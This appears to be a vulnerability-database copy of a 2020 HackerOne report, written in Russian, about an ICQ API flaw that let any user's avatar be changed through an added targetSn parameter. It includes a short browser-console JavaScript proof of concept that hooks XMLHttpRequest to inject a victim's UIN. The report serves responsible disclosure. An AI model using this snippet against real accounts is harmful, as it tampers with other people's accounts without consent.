Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneKriakikuH1:786745
HistoryJan 31, 2020 - 8:36 a.m.

Mail.ru: [API] ICQ user's avatar can be manipulated remotely

2020-01-3108:36:43
kriakiku
hackerone.com
$1000
74
JSON

Description:

При обращении к API методу установки аватара пользователя (https://ub.icq.net/files/api/v1.1/avatar/set)
Можно передать дополнительный GET параметр: targetSn - с установленным UIN’ом любого пользователя
Тем самым можем изменить аватарку у любого пользователя

Steps To Reproduce:

  1. Открыть Web версию ICQ
  2. Вставляем в консоль браузера следующий код (Указав вместо UIN атакуемый аккаунт):
const XHR_OPEN = XMLHttpRequest.prototype.open;

XMLHttpRequest.prototype.open = function (...args) {
  let url = new URL(args[1])
  if (url.pathname === '/files/api/v1.1/avatar/set') {
    url.searchParams.set('targetSn', '___UIN___')
    args[1] = url.toString()
    console.log(args[1])
  }
  return XHR_OPEN.apply(this, args);
}
  1. Заменить аватар пользователя

Скринкаст:

█████████

Impact

Частичный доступ к управлению чужими аккаунтами (возможно уязвимость применима и к другим методам API).

JSON